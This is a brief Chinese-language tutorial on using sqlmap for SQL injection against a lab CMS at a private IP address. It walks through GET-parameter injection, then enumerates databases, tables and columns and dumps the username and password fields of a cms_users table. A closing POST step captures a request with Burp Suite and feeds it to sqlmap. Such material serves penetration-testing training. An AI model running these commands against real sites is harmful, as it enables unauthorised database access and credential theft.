文章目录
前言
本篇主要介绍通过使用全自动注入SqlMap实现GET注入和POST注入。
一、GET注入
1. -u
sqlmap -u "http://192.168.35.144/cms/show.php?id=35"
【 -u:需要扫描的url】- SqlMap 得到结果:
- 针对GET参数是一个注入点,有四种注入方法:布尔盲注,报错注入,延时注入,联合查询
- Payload 后面的东西就相当于一个注入时输入的模板
2. -dbs
- 语句:
sqlmap -u "http://192.168.35.144/cms/show.php?id=35" --dbs
列出所有数据库的名字
3. --current ~~~~~ -db
语句: sqlmap -u "http://192.168.35.144/cms/show.php?id=35" --current-db
列出当前数据库的名字
4. -D ~~~~~ –tables
语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" -D "cms" --tables
-D指定一个数据库 --tables 列出表名
5. -T ~~~~~ –columns
语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" -D "cms" -T "cms_users" --columns
【 -T 指定表名 --columns 列出表中所有字段 】
6. -C ~~~~~ –dump
语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" -D "cms" -T "cms_users" -C "username,password" --dump
【 -C 指定字段 --dump 列出字段内容 】
二、POST注入
Step1. 抓包
kali里使用BurpSuite,抓到POST数据包,并将这个包复制粘贴到kali的文件post.txt中
Step2. POST注入
sqlmap -r post.txt
自动读取包内容,并进行sql注入测试,并得到注入结果。